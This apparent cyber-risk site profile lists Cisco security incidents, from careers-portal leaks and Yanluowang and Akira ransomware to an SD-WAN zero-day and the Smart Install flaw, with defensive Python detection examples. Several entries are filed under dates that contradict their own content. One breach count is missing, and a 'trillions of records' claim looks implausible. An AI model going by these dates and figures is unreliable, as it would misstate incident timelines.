Cisco has addressed a security flaw that allowed personal data to leak from the company's Professional Careers portal. In its email notification to affected individuals, Cisco said that only a small amount of information connected to job applications was exposed, through the mobile version of the site. According to the security alert Cisco sent to users, the cause was an erroneous security configuration on a third-party site following system maintenance. The exposed information comprises personal details such as name, password, email address, phone number, security question answers, professional profile and educational background, cover letter, resume content, and other details.
INCIDENT DETAILS -
TYPE
Data Leak
IMPACT
Name, password, email address, phone number, security question answers, professional profile, educational background, cover letter, resume content; Systems Affected: Professional Careers portal
DATA BREACH
Personal details, professional profile, educational background, cover letter, resume content, name, email address, phone number, security question answers
MARCH 2023
636Before Incident
Ransomware
01 Mar 2023Cisco
Veeam, SonicWall and Cisco: Researchers Observe Sub-One-Hour Ransomware Attacks

Akira Ransomware Group Accelerates Attacks, Completing Full Compromise in Under an Hour

525After Incident
CRITICAL-111
VEESONCIS1775140482
Akira Ransomware Group Accelerates Attacks, Completing Full Compromise in Under an Hour Security researchers at Halcyon have identified a significant escalation in ransomware attack speed, with the Akira group now executing full attack lifecycles, from initial access to data encryption, in as little as one hour. The group, suspected to include former Conti hackers, has emerged as one of the most sophisticated ransomware operations since its debut in March 2023. Akira primarily gains entry by exploiting vulnerabilities in internet-facing VPN appliances and backup solutions, particularly those without multi-factor authentication (MFA). Targeted vendors have included SonicWall, Veeam, and Cisco, though the group also employs credential theft, spearphishing, password spraying, and initial access brokers (IABs) to breach networks. Once inside, Akira follows a double-extortion model, exfiltrating data before encrypting files. To evade detection, the group disables security software and relies on legitimate, widely available tools such as FileZilla, WinRAR, WinSCP, and RClone for staging and exfiltration rather than custom malware. Notably, Akira uses intermittent encryption, scrambling as little as 1% of each file, to maximize impact while minimizing the time the encryptor needs and the chance that file-activity monitoring catches it. Halcyon's report highlights Akira's disciplined operational tempo, with attacks typically completed in under four hours and some in less than 60 minutes. The group's stealthy approach, reliance on zero-day exploits, and use of compromised credentials allow it to maintain covert access while rapidly encrypting systems. Since its emergence, Akira has reportedly generated $244 million in ransom payments, according to U.S. government estimates.
INCIDENT DETAILS -
TYPE
Ransomware
MOTIVATION
Financial gain (ransom payments)
IMPACT
Financial Loss: $244 million in ransom payments (estimated)
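Intermittent encryption, as described above, defeats detectors that wait for a whole file to turn into high-entropy bytes. The added example below (written for this page; not Halcyon's tooling and not Akira's encryptor) shows the check a responder can run over files: compute per-window entropy, and treat a file that mixes readable windows with ciphertext-looking windows at a fixed stride as a partial-encryption candidate. The 4 KiB window, the 7.5 bits/byte threshold, the every-tenth-block stripe in the sample and the sample data itself are assumptions constructed for the demonstration; the page does not say which blocks Akira touches.

```python
import math
import random
from collections import Counter
from typing import Optional

# Assumptions, not figures from the Halcyon report: 4 KiB analysis windows
# and the entropy threshold. Encrypted or compressed bytes sit near 8.0
# bits/byte; documents, logs and source code sit well below 6.0.
CHUNK_SIZE = 4096
HIGH_ENTROPY = 7.5


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte of `data` (0.0 for empty input)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def chunk_entropies(data: bytes, chunk_size: int = CHUNK_SIZE) -> list:
    """Entropy of each fixed-size window, in file order."""
    return [shannon_entropy(data[i:i + chunk_size])
            for i in range(0, len(data), chunk_size)]


def stripe_period(high_positions: list) -> Optional[int]:
    """Return the stride if every high-entropy window is the same distance
    from the previous one. A partial encryptor that touches every Nth block
    produces exactly that pattern; a document with one embedded image or
    archive does not, which keeps ordinary mixed-entropy files from alerting."""
    if len(high_positions) < 3:
        return None
    gaps = {b - a for a, b in zip(high_positions, high_positions[1:])}
    return gaps.pop() if len(gaps) == 1 else None


def classify(data: bytes) -> dict:
    """Label a file body and report how much of it looks encrypted."""
    ents = chunk_entropies(data)
    if not ents:
        return {"verdict": "empty", "encrypted_fraction": 0.0, "period": None}
    high = [i for i, e in enumerate(ents) if e >= HIGH_ENTROPY]
    if not high:
        verdict = "plaintext"
    elif len(high) == len(ents):
        verdict = "fully_high_entropy"   # encrypted end to end, or just compressed
    else:
        verdict = "intermittent"         # readable content with ciphertext stripes
    return {"verdict": verdict,
            "encrypted_fraction": round(len(high) / len(ents), 4),
            "period": stripe_period(high)}


def random_bytes(rng: random.Random, n: int) -> bytes:
    """Seeded pseudo-random bytes (stand-in for ciphertext in the samples)."""
    return bytes(rng.getrandbits(8) for _ in range(n))


def build_samples(seed: int = 7) -> dict:
    """Constructed inputs, not real victim files: a text document, a blob that
    looks encrypted throughout, and the text with every tenth 4 KiB block
    overwritten by random bytes, the shape a partial encryptor leaves behind."""
    rng = random.Random(seed)
    words = ["invoice", "quarterly", "router", "network", "change", "approved",
             "customer", "schedule", "policy", "review", "vendor", "backup"]
    text = " ".join(rng.choice(words) for _ in range(60_000)).encode()
    text = text[:64 * CHUNK_SIZE]
    blob = random_bytes(rng, 64 * CHUNK_SIZE)
    striped = bytearray(text)
    for block in range(0, 64, 10):
        start = block * CHUNK_SIZE
        striped[start:start + CHUNK_SIZE] = random_bytes(rng, CHUNK_SIZE)
    return {"text": text, "blob": blob, "striped": bytes(striped)}


if __name__ == "__main__":
    for name, body in build_samples().items():
        print(name, classify(body))
```

Two caveats for anyone deploying this. Archives, images and already-encrypted files legitimately come out as `fully_high_entropy`, so the useful signal is a change of verdict on files that were readable at the last baseline, not a one-off scan; and `period` is what separates a partial encryptor from a document with an embedded binary, so alert on `intermittent` with a non-null period first and triage the rest.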
JANUARY 2023
627Before Incident
Vulnerability
01 Jan 2023Cisco
Cisco: Critical Cisco SD-WAN 0-Day Vulnerability Exploited Since 2023 to Gain Root Access

Critical Cisco SD-WAN Zero-Day Exploited Since 2023, Enabling Root Access

626After Incident
CRITICAL-1
CIS1772072640
Critical Cisco SD-WAN Zero-Day Exploited Since 2023, Enabling Root Access Cisco has disclosed a critical zero-day vulnerability (CVE-2026-20127) in its Catalyst SD-WAN products, actively exploited since at least 2023 to bypass authentication and gain root-level access. The flaw, rated 10.0 on the CVSS scale, affects the peering authentication mechanism in Cisco Catalyst SD-WAN Controller (formerly vSmart) and SD-WAN Manager (formerly vManage), allowing unauthenticated attackers to log in as high-privileged users and manipulate network configurations via NETCONF. Exploitation lets attackers add rogue peers, alter routing, or downgrade the software so that an older flaw such as CVE-2022-20775 can be chained for root escalation, after which the original version is restored to evade detection. Cisco Talos attributes the campaign (tracked as UAT-8616) to a sophisticated threat actor targeting critical infrastructure, with confirmed compromises of internet-exposed management planes. Patches were released on February 25, 2026, for affected versions (20.3.1–20.14.3, 20.15.1), with no workarounds available. CISA added the vulnerability to its Known Exploited Vulnerabilities Catalog the same day and issued Emergency Directive 26-03 requiring federal agencies to patch within 21 days and hunt for indicators of compromise. Global cybersecurity agencies, including Australia's ACSC and Canada's CCCS, issued parallel alerts citing real-world incidents involving rogue peer additions. Organizations are advised to inventory SD-WAN deployments, audit NETCONF logs, and restrict management plane access. Cisco's guidance includes CLI checks for unauthorized peers and resetting compromised configurations. The incident underscores persistent threats to edge devices in critical sectors.
INCIDENT DETAILS -
TYPE
Zero-Day Exploitation
MOTIVATION
Root-level access, network manipulation, critical infrastructure targeting
IMPACT
Systems Affected: Cisco Catalyst SD-WAN Controller (vSmart), SD-WAN Manager (vManage)Operational Impact: Network configuration manipulation, rogue peer additions, routing alterations
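The hunt the advisory asks for has three concrete questions: were peers added that are not in your inventory, did configuration changes arrive from outside the management network, and was a device downgraded and then put back, the chain-then-cover-tracks pattern described above. The added example below (written for this page; not Cisco's or Talos's tooling) runs those three checks over a constructed, normalised change log. The event schema, the approved-peer list, the management subnet, the 24-hour restore window and the version numbers in the sample are all assumptions; real SD-WAN Manager audit logs and NETCONF traces need a parser into this shape, and the downgrade target shown is illustrative, not a claim about any specific release.

```python
import ipaddress
from datetime import datetime, timedelta

# Assumptions: the peers the controllers are supposed to know, the admin
# network from which configuration changes are allowed, and the window
# inside which a downgrade followed by a restore is treated as one action.
APPROVED_PEERS = {"10.0.0.11", "10.0.0.12", "10.0.0.13"}
MGMT_NETWORKS = [ipaddress.ip_network("10.10.0.0/24")]
RESTORE_WINDOW = timedelta(hours=24)

# Constructed events in a hypothetical normalised schema (timestamp, device,
# acting user, client source address, action and its arguments).
EVENTS = [
    {"ts": "2026-02-20T01:02:03", "device": "vmanage-1", "user": "admin",
     "src": "10.10.0.5", "action": "peer_add", "peer": "10.0.0.12"},
    {"ts": "2026-02-20T02:10:00", "device": "vmanage-1", "user": "admin",
     "src": "203.0.113.7", "action": "peer_add", "peer": "198.51.100.9"},
    {"ts": "2026-02-20T02:12:00", "device": "vmanage-1", "user": "admin",
     "src": "203.0.113.7", "action": "version_change",
     "from": "20.12.3", "to": "20.6.1"},
    {"ts": "2026-02-20T03:40:00", "device": "vmanage-1", "user": "admin",
     "src": "203.0.113.7", "action": "version_change",
     "from": "20.6.1", "to": "20.12.3"},
    {"ts": "2026-02-21T09:00:00", "device": "vsmart-1", "user": "netops",
     "src": "10.10.0.6", "action": "version_change",
     "from": "20.12.3", "to": "20.12.4"},
]


def version_tuple(version: str) -> tuple:
    """'20.12.3' -> (20, 12, 3) so dotted releases compare numerically."""
    return tuple(int(part) for part in version.split("."))


def from_mgmt_network(src: str) -> bool:
    addr = ipaddress.ip_address(src)
    return any(addr in net for net in MGMT_NETWORKS)


def audit(events: list) -> list:
    """One finding per suspicious observation: a change from outside the
    admin network, a peer not in the inventory, or a version downgrade that
    is undone within RESTORE_WINDOW on the same device."""
    findings = []
    pending_downgrade = {}   # device -> (timestamp, version before the downgrade)
    for e in sorted(events, key=lambda ev: ev["ts"]):
        ts = datetime.fromisoformat(e["ts"])
        if not from_mgmt_network(e["src"]):
            findings.append({"ts": e["ts"], "device": e["device"],
                             "type": "untrusted_source", "detail": e["src"]})
        if e["action"] == "peer_add" and e["peer"] not in APPROVED_PEERS:
            findings.append({"ts": e["ts"], "device": e["device"],
                             "type": "unknown_peer", "detail": e["peer"]})
        elif e["action"] == "version_change":
            old, new = version_tuple(e["from"]), version_tuple(e["to"])
            if new < old:
                pending_downgrade[e["device"]] = (ts, old)
                continue
            # An upgrade: see whether it merely restores a recent downgrade.
            prior = pending_downgrade.pop(e["device"], None)
            if prior and ts - prior[0] <= RESTORE_WINDOW and new >= prior[1]:
                findings.append({"ts": e["ts"], "device": e["device"],
                                 "type": "downgrade_then_restore",
                                 "detail": f"{e['from']} -> {e['to']}"})
    return findings


if __name__ == "__main__":
    for finding in audit(EVENTS):
        print(finding)
```

The version-change pair is the check worth keeping even after patching: a downgrade that is reversed within hours is rarely a planned change, and correlating it with the source address and the peer list turns three weak signals into one strong one. Note that a downgrade never followed by a restore produces no finding here; add a separate alert for that if the device is one that should never move backwards.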
SEPTEMBER 2022
627Before Incident
Breach
01 Sep 2022Cisco
Cisco

Cisco Data Leak by Yanluowang Ransomware Gang

603After Incident
CRITICAL-24
CIS193291022
Cisco was the target of a data leak by the Yanluowang ransomware gang in September 2022. The gang published data stolen from the company's network during a cyberattack in May. Cisco described the stolen material as non-sensitive files from an employee's Box folder; the gang claimed the cache ran to thousands of files totalling 55GB and included classified documents, technical schematics, and source code.
INCIDENT DETAILS -
TYPE
Data Leak
IMPACT
Data Compromised: non-sensitive files, classified documents, technical schematics, source code
DATA BREACH
Type Of Data Compromised: non-sensitive files, classified documents, technical schematics, source code
Sensitivity Of Data: non-sensitive (per Cisco); high (per the gang's claims: documents, schematics, source code)
AUGUST 2022
705Before Incident
Ransomware
01 Aug 2022Cisco
Cisco

Cisco Hacked by Yanluowang Ransomware Gang

621After Incident
CRITICAL-84
CIS0217922
Cisco was hacked by the Yanluowang ransomware gang, which claims to have stolen 2.8GB of data. The categories the gang says it took cover Cisco products or services, sensitive customer data or sensitive employee information, intellectual property, and supply chain operations. As evidence of the intrusion, and as a "hint" that they had infiltrated Cisco's network and taken files, the threat actors supplied BleepingComputer with a redacted NDA agreement obtained in the attack. Cisco states that it immediately took action to contain and eradicate the attackers.
INCIDENT DETAILS -
TYPE
Ransomware
MOTIVATION
Data theft and ransom
IMPACT
Data Compromised: Cisco products or services, sensitive customer data, sensitive employee information, intellectual property, supply chain operations
DATA BREACH
Type Of Data Compromised: Cisco products or services, sensitive customer data, sensitive employee information, intellectual property, supply chain operations
Sensitivity Of Data: High
Data Exfiltration: 2.8GB
MAY 2022
772Before Incident
Ransomware
01 May 2022Cisco
Cisco

Yanluowang Ransomware Attacks Facilitated by Initial Access Broker Aleksey Olegovich Volkov

694After Incident
CRITICAL-78
CIS2802228111125
In May 2022, Cisco was hit by a Yanluowang ransomware intrusion whose initial foothold was supplied by Aleksey Olegovich Volkov, an initial access broker (IAB); the entry point was a compromised Cisco employee's Box folder. The attackers exfiltrated non-sensitive files but did not encrypt Cisco's systems or succeed in extorting a ransom. Even so, the incident showed that a threat actor could get into the corporate network, steal credentials, and potentially deploy ransomware. The attack was part of a broader campaign against at least eight U.S. companies in which Volkov sold network access to Yanluowang operators, who then demanded ransoms ranging from $300,000 to $15 million. Although Cisco avoided financial loss and data encryption in this instance, the breach underscored the risks of credential theft, the ransomware supply chain of brokered access, and ransomware-as-a-service (RaaS) operations. Evidence recovered in the FBI's investigation also suggested a link between Volkov and the LockBit ransomware gang.
INCIDENT DETAILS -
TYPE
Ransomware, Initial Access Brokerage, Data Breach, Cyber Extortion
MOTIVATION
financial gain
IMPACT
Financial Loss: $9,167,198.19 (restitution amount)
Legal Liabilities: $9,167,198.19 (restitution) + potential fines
DATA BREACH
Type Of Data Compromised: corporate network credentials, stolen data (unspecified), non-sensitive files (Cisco Box folder)
Sensitivity Of Data: low (Cisco case: non-sensitive files); high (credentials, corporate data)
FEBRUARY 2022
769Before Incident
Vulnerability
01 Feb 2022Cisco
Cisco

Cisco Small Business RV Series Router Vulnerabilities

768After Incident
CRITICAL-1
CIS13829322
Cisco has released security patches for multiple vulnerabilities in its Small Business RV Series router platform. The most severe of them could allow a remote attacker to gain complete control of a device without authentication. An attacker who exploits the flaws could execute arbitrary code, elevate privileges, run commands, bypass authentication protections, and retrieve and execute unsigned software.
INCIDENT DETAILS -
TYPE
Vulnerability Exploitation, Remote Code Execution, Privilege Escalation
IMPACT
Systems Affected: Cisco Small Business RV Series routers
JULY 2021
816Before Incident
Ransomware
01 Jul 2021Cisco
Cisco: Yanluowang ransomware access broker gets 81 months in prison

Russian Initial Access Broker Sentenced for Role in Yanluowang Ransomware Attacks

759After Incident
CRITICAL-57
CIS1774362550
Russian Initial Access Broker Sentenced to Nearly 7 Years for Role in Yanluowang Ransomware Attacks A 26-year-old Russian national, Aleksey Olegovich Volkov (also known as "chubaka.kor" and "nets"), has been sentenced to 81 months in prison for his role as an initial access broker (IAB) in the Yanluowang ransomware attacks. Volkov pleaded guilty in November 2023 to breaching corporate networks of at least eight U.S. companies between July 2021 and November 2022, selling that access to the Yanluowang ransomware-as-a-service (RaaS) operation. The Yanluowang affiliates encrypted victims' data and demanded ransoms ranging from $300,000 to $15 million. Volkov was extradited to the U.S. after his arrest in Italy in January 2024. U.S. prosecutors charged him following an incident where the Yanluowang gang stole files from a Cisco employee's Box folder but failed to encrypt systems or collect a ransom. As part of his plea, Volkov admitted to hacking into victims' networks, stealing data, deploying ransomware, and demanding cryptocurrency payments. The Justice Department revealed that the FBI recovered chat logs, stolen data, victims' network credentials, and evidence of ransom negotiations from a seized server linked to the gang. Investigators traced Volkov's identity through Apple iCloud data, cryptocurrency exchange records, and social media accounts linked to his Russian passport and phone number. The chat logs showed Volkov negotiating a percentage of ransom payments, which totaled $1.5 million. Additionally, a screenshot from Volkov's Apple account suggested a potential link to the LockBit ransomware gang. Volkov was initially facing a maximum sentence of 53 years but was sentenced to 81 months in prison. He is required to pay over $9 million in restitution to the victims of the Yanluowang ransomware attacks. The Justice Department stated that Volkov agreed to pay full restitution to known victims, totaling $9,167,198.19, and forfeit equipment used in his crimes.
INCIDENT DETAILS -
TYPE
Ransomware
MOTIVATION
Financial gain
IMPACT
Financial Loss: $9,167,198.19 (restitution)
Data Compromised: Stolen files, network credentials, and victim data
Systems Affected: Corporate networks of at least eight U.S. companies
Operational Impact: Data encryption, ransom demands, and operational disruption
Legal Liabilities: Fines and restitution
DATA BREACH
Type Of Data Compromised: Files, network credentials, victim data
Sensitivity Of Data: High (corporate and potentially personally identifiable information)
Data Exfiltration: Yes
Data Encryption: Yes (by Yanluowang ransomware)
JANUARY 2020
806Before Incident
Breach
01 Jan 2020Cisco
Ticketmaster, Microsoft, Cisco, Google, AT&T, McDonald’s, Princeton, Disney/Hulu, Instructure and Harvard: Lessons from the Canvas cyberattack

ShinyHunters Hacking Group Targets Major Organizations, Including Education Sector

804After Incident
CRITICAL-2
TICHARATTPRIMCDTHEGOOCISINSMIC1780482275
ShinyHunters Hacking Group Targets Major Organizations, Including Education Sector The cybercriminal group ShinyHunters, named after the rare "Shiny" Pokémon sought after by players, has emerged as a significant threat since 2020. According to threat intelligence from Ransomware.live, the group has compromised 104 victims across 14 countries, stealing trillions of records. The majority of attacks (73 incidents) have targeted U.S.-based organizations, including high-profile names such as Microsoft, Ticketmaster, Google, Cisco, AT&T, McDonald's, Disney/Hulu, Harvard, and Princeton. One of the group's most disruptive attacks involved Instructure's Canvas Learning Management System (LMS), which serves educational institutions. The breach exploited a vulnerability in the Free for Teacher environment, a no-cost version of Canvas that allows independent educators to manage classes. Following the attack, Instructure temporarily disabled the service while conducting a security review. The incident highlights the broader risks posed by centralized digital ecosystems and third-party dependencies, demonstrating how modern extortion operations can disrupt critical sectors well beyond education. While technical details remain limited, the attack underscores the growing threat of sophisticated cybercriminal groups targeting both corporate and institutional infrastructure.
INCIDENT DETAILS -
TYPE
Data Breach
MOTIVATION
Data Theft, Extortion
IMPACT
Data Compromised: Trillions of records
Systems Affected: Canvas Learning Management System (LMS)
Downtime: Temporary service disruption
Operational Impact: Service disabled during security review
DATA BREACH
Type Of Data Compromised: Records (unspecified)
Number Of Records Exposed: Trillions
Vulnerability
01 Jan 2020Cisco
Microsoft, 7-Eleven, Cisco, NGINX and Broadcom: 7-Eleven - Security Affairs

Pwn2Own Berlin 2026 Highlights Major Exploits and Cyber Incidents

804After Incident
CRITICAL-2
BROMIC7-ENGICIS1779164825
Pwn2Own Berlin 2026 Highlights Major Exploits as Zero-Days and Breaches Surge The second and third days of Pwn2Own Berlin 2026 saw researchers earn $385,750 in bounties, pushing the event's total payout to $1.298 million. Among the notable exploits, Microsoft Exchange Server was successfully compromised, contributing to the growing tally. DEVCORE was crowned "Master of Pwn" after demonstrating multiple high-impact vulnerabilities. In parallel, Chaotic Eclipse disclosed MiniPlasma, a zero-day in Windows, suggesting an incomplete or overlooked security fix from 2020. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a Microsoft Exchange Server flaw and a Cisco Catalyst SD-WAN vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, signaling active exploitation risks. A critical 18-year-old flaw (CVE-2026-42945) in NGINX, the world's most widely deployed web server, was also uncovered, with experts warning of ongoing attacks. Meanwhile, Grafana confirmed a GitHub token breach after a cybercrime group claimed responsibility, while ShinyHunters breached 7-Eleven, exposing franchisee data and Salesforce records. Additional incidents included:
- A public Amazon S3 bucket leaking sensitive guest data from Japanese hotel platform Tabiq.
- OpenAI suffering a supply chain attack via malicious TanStack packages.
- Broadcom releasing a security update for a VMware Fusion root access bug.
- The Ghostwriter group resuming cyberattacks on Ukrainian government targets.
- Researchers identifying YellowKey and GreenPlasma, two new Windows zero-days.
- A Linux Kernel bug (Fragnesia) enabling local root access attacks.
- Attackers exploiting a Funnel Builder vulnerability to inject e-skimmers into e-commerce stores.
The event underscored persistent threats across enterprise software, cloud services, and critical infrastructure, with zero-days and supply chain attacks remaining dominant vectors.
INCIDENT DETAILS -
TYPE
Zero-day ExploitData BreachSupply Chain AttackRansomware
MOTIVATION
Financial GainCyber EspionageData TheftDemonstration of Exploits
IMPACT
Financial Loss: $385,750 (bounties paid on days two and three); $1.298 million (total event payout)
Data Compromised: GitHub tokens, franchisee data, Salesforce records, guest data (Tabiq), personally identifiable information
Systems Affected: Microsoft Exchange Server, Windows OS, NGINX, Cisco Catalyst SD-WAN, VMware Fusion, Grafana, 7-Eleven systems, OpenAI (via TanStack packages), e-commerce stores (via e-skimmers)
Operational Impact: Service disruption, unauthorized access, data exfiltration
Organizations Breached: Grafana, 7-Eleven, OpenAI, Tabiq
Sensitivity: High (PII exposed); High (e-skimmers injected)
DATA BREACH
Type Of Data Compromised: GitHub tokens, franchisee data, Salesforce records, guest data, PII
Sensitivity Of Data: High
Data Exfiltration: Yes (ShinyHunters, Ghostwriter group)
Data Encryption: Yes
SEPTEMBER 2018
820Before Incident
Breach
24 Sep 2018Cisco
Cisco

Unauthorized Access to Cisco Cloud Infrastructure

785After Incident
HIGH-35
CIS205918123
A former Cisco employee accessed the company's cloud infrastructure in 2018, five months after resigning, to deploy code that led to the shutdown of more than 16,000 WebEx Teams accounts and the deletion of 456 virtual machines. 30-year-old Sudhish Kasaba Ramesh accessed Cisco's cloud infrastructure hosted on Amazon Web Services without permission on September 24, 2018. The shutdown forced Cisco to spend more than $2,400,000 in customer refunds and employee time needed to restore the damage caused by Ramesh.
INCIDENT DETAILS -
TYPE
Unauthorized Access
MOTIVATION
Malicious intent
IMPACT
Financial Loss: $2,400,000
Systems Affected: 16,000 WebEx Teams accounts, 456 virtual machines
Operational Impact: Significant
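The failure in the entry above is an identity one: credentials that should have died at resignation were still valid five months later. The added example below (written for this page; not Cisco's or AWS's tooling) is the review a cloud team can run by joining the provider's credential inventory with the HR separation list, flagging accounts still enabled after departure, activity after the separation date, and dormant keys on active accounts. The record schema, the 90-day dormancy threshold, the usernames, keys and dates are all constructed; the audit date is set to the date of the access in the entry above only to make the sample readable.

```python
from datetime import date, timedelta

# Assumptions: a key or login unused this long is dormant, and the review
# runs on the date below (matching the timeline entry, purely for readability).
DORMANT_AFTER = timedelta(days=90)
AUDIT_DATE = date(2018, 9, 24)

# Constructed identity records in a hypothetical schema, not real IAM data.
# A live run would build the same shape from the cloud provider's credential
# report joined with the HR system's separation dates.
ACCOUNTS = [
    {"user": "dev-a", "enabled": True, "console_last_login": date(2018, 4, 10),
     "keys": [{"id": "KEY-A1", "created": date(2017, 11, 2), "last_used": date(2018, 9, 24)}]},
    {"user": "dev-b", "enabled": False, "console_last_login": date(2018, 1, 25),
     "keys": [{"id": "KEY-B1", "created": date(2017, 6, 1), "last_used": date(2018, 1, 20)}]},
    {"user": "ops-c", "enabled": True, "console_last_login": date(2018, 9, 23),
     "keys": [{"id": "KEY-C1", "created": date(2018, 1, 15), "last_used": date(2018, 9, 20)}]},
    {"user": "svc-deploy", "enabled": True, "console_last_login": None,
     "keys": [{"id": "KEY-D1", "created": date(2017, 9, 1), "last_used": date(2018, 3, 1)},
              {"id": "KEY-D2", "created": date(2018, 9, 1), "last_used": None}]},
]
# user -> separation date, from HR (constructed)
SEPARATED = {"dev-a": date(2018, 4, 30), "dev-b": date(2018, 2, 1)}


def review(accounts: list, separated: dict, audit_date: date = AUDIT_DATE) -> list:
    """Three checks per account. Separated users: is the account still
    enabled, and was any credential used after the separation date?
    Everyone else who is enabled: is any access key dormant (never used, or
    unused for longer than DORMANT_AFTER)?"""
    findings = []
    for acct in accounts:
        user = acct["user"]
        left = separated.get(user)
        if left:
            if acct["enabled"]:
                findings.append({"user": user, "type": "enabled_after_separation",
                                 "detail": f"separated {left}"})
            seen = [acct["console_last_login"]] + [k["last_used"] for k in acct["keys"]]
            latest = max((d for d in seen if d), default=None)
            if latest and latest > left:
                findings.append({"user": user, "type": "activity_after_separation",
                                 "detail": f"last activity {latest}"})
            continue   # dormancy checks are for current staff and service accounts
        if not acct["enabled"]:
            continue
        for key in acct["keys"]:
            last = key["last_used"] or key["created"]   # never used: age from creation
            if audit_date - last > DORMANT_AFTER:
                findings.append({"user": user, "type": "dormant_key",
                                 "detail": f"{key['id']} last used {last}"})
    return findings


if __name__ == "__main__":
    for finding in review(ACCOUNTS, SEPARATED):
        print(finding)
```

`activity_after_separation` is the finding that would have surfaced the case above, and it is only answerable if the HR separation date reaches the security team; the dormancy check is the fallback for access that was never tied to a person, such as service accounts whose owners have moved on.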
JUNE 2018
821Before Incident
Vulnerability
16 Jun 2018Cisco
Cisco

CVE-2018-0171 Exploitation in Cisco Networking Equipment

819After Incident
CRITICAL-2
CIS929041225
A severe vulnerability in the Smart Install feature of Cisco's networking equipment, identified as CVE-2018-0171, has been exploited by attackers, notably the APT group Salt Typhoon. Despite a patch released in 2018, over 1,200 devices remain unpatched, leaving an attack surface for unauthorized remote code execution and configuration theft. The attacks chiefly use the Smart Install service to extract device configurations and other sensitive data from networking devices, which feeds further intrusions and potentially catastrophic network breaches. This enduring security oversight, which notably affected telecommunications providers, exemplifies the danger legacy systems pose to current technology infrastructure.
INCIDENT DETAILS -
TYPE
Vulnerability Exploitation
MOTIVATION
Data Theft, Unauthorized Access
IMPACT
Data Compromised: Sensitive Data
Systems Affected: Networking Devices
DATA BREACH
Type Of Data Compromised: Sensitive Data
Sensitivity Of Data: High
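Smart Install listens on TCP port 4786, so the exposure in the entry above is visible in flow data before any exploit lands: a switch that answers on 4786 has the feature on, an external client talking to it is an unwanted one, and a large reply is consistent with a configuration being pulled. The added example below (written for this page; not Cisco's or any vendor's tooling) runs those checks over constructed flow records and produces both alerts and the list of devices to review. The flow schema, the management subnet, the device inventory and the 20 KB "more than a handshake" threshold are assumptions; Cisco's own advisory documents `show vstack config` for checking the feature and `no vstack` for disabling it where it is not needed.

```python
import ipaddress

SMART_INSTALL_PORT = 4786   # TCP port the Smart Install client listens on

# Assumptions: the network that legitimately manages switches, the switch
# management addresses, and how much reply traffic is "more than a handshake".
# A pulled running-config is tens of kilobytes; a probe exchange is not.
MGMT_NETWORKS = [ipaddress.ip_network("10.10.0.0/24")]
NETWORK_DEVICES = {"10.0.1.1", "10.0.1.2", "10.0.1.3"}
BULK_REPLY_BYTES = 20_000

# Constructed flow records (initiator -> responder), not real telemetry.
# bytes_in is what the responder sent back; non-zero means it answered.
FLOWS = [
    {"src": "10.10.0.5", "dst": "10.0.1.1", "proto": "tcp", "dport": 22,
     "bytes_out": 900, "bytes_in": 3_000},
    {"src": "198.51.100.23", "dst": "10.0.1.2", "proto": "tcp", "dport": 4786,
     "bytes_out": 48, "bytes_in": 64},
    {"src": "198.51.100.23", "dst": "10.0.1.2", "proto": "tcp", "dport": 4786,
     "bytes_out": 120, "bytes_in": 71_000},
    {"src": "10.10.0.7", "dst": "10.0.1.3", "proto": "tcp", "dport": 4786,
     "bytes_out": 48, "bytes_in": 64},
    {"src": "203.0.113.9", "dst": "10.0.1.9", "proto": "tcp", "dport": 4786,
     "bytes_out": 48, "bytes_in": 0},
]


def in_mgmt_network(src: str) -> bool:
    addr = ipaddress.ip_address(src)
    return any(addr in net for net in MGMT_NETWORKS)


def analyze(flows: list) -> dict:
    """Split Smart Install traffic into alerts and an exposure list.
    findings: an initiator outside the management network, a reply large
    enough to be a configuration pull, or a responder missing from the
    device inventory. exposed: every device that answered on 4786 at all,
    i.e. the ones to check with `show vstack config`."""
    findings, exposed = [], set()
    for f in flows:
        if f["proto"] != "tcp" or f["dport"] != SMART_INSTALL_PORT:
            continue
        if f["bytes_in"] > 0:
            exposed.add(f["dst"])
        if not in_mgmt_network(f["src"]):
            findings.append({"type": "external_source", "src": f["src"], "dst": f["dst"]})
        if f["bytes_in"] >= BULK_REPLY_BYTES:
            findings.append({"type": "bulk_reply", "src": f["src"], "dst": f["dst"],
                             "bytes_in": f["bytes_in"]})
        if f["dst"] not in NETWORK_DEVICES:
            findings.append({"type": "unlisted_device", "src": f["src"], "dst": f["dst"]})
    return {"findings": findings, "exposed": sorted(exposed)}


if __name__ == "__main__":
    result = analyze(FLOWS)
    for finding in result["findings"]:
        print(finding)
    print("review for `no vstack`:", result["exposed"])
```

The `exposed` list is the durable output: a device that answers on 4786 from the management network is not an incident, but it is a device that will be an incident the day a management-plane host is compromised, and patching the 2018 CVE does not remove the listener. The `unlisted_device` finding catches the other common gap, a switch nobody put in the inventory.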
AUGUST 2016
836Before Incident
Breach
18 Aug 2016Cisco
Cisco Systems, Inc.

Cisco Systems Data Breach

812After Incident
HIGH-24
CIS747072825
The California Office of the Attorney General reported on October 25, 2016, that Cisco Systems, Inc. experienced a data breach on August 18, 2016. The breach involved a security setting error on the Cisco Professional Careers mobile website, potentially exposing job application-related personal information including names, addresses, emails, phone numbers, and other sensitive data. Approximately individuals were affected.
INCIDENT DETAILS -
TYPE
Data Breach
IMPACT
Data Compromised: names, addresses, emails, phone numbers, other sensitive data
Systems Affected: Cisco Professional Careers mobile website
DATA BREACH
Type Of Data Compromised: Personal Information (names, addresses, emails, phone numbers)
Sensitivity Of Data: High

Frequently Asked Questions

What is the current A.I Rankiteo Cyber Score for Cisco ?
What was Cisco's A.I Rankiteo Cyber Score in May 2026 ?
What was Cisco's A.I Rankiteo Cyber Score in April 2026 ?
What was Cisco's A.I Rankiteo Cyber Score in March 2026 ?
What was Cisco's A.I Rankiteo Cyber Score in February 2026 ?
What was Cisco's A.I Rankiteo Cyber Score in January 2026 ?
What was Cisco's A.I Rankiteo Cyber Score in December 2025 ?
What was Cisco's A.I Rankiteo Cyber Score in November 2025 ?
What was Cisco's A.I Rankiteo Cyber Score in October 2025 ?
What was Cisco's A.I Rankiteo Cyber Score in September 2025 ?
What was Cisco's A.I Rankiteo Cyber Score in August 2025 ?
What was Cisco's A.I Rankiteo Cyber Score in July 2025 ?
What is the average per-incident point impact on Cisco's A.I Rankiteo Cyber Score over the past 12 months ?
Where can I access detailed records of all cyber incidents associated with Cisco ?
Where can I find a summary of the A.I Rankiteo Risk Scoring methodology ?
Where can I view Cisco's profile page on Rankiteo ?
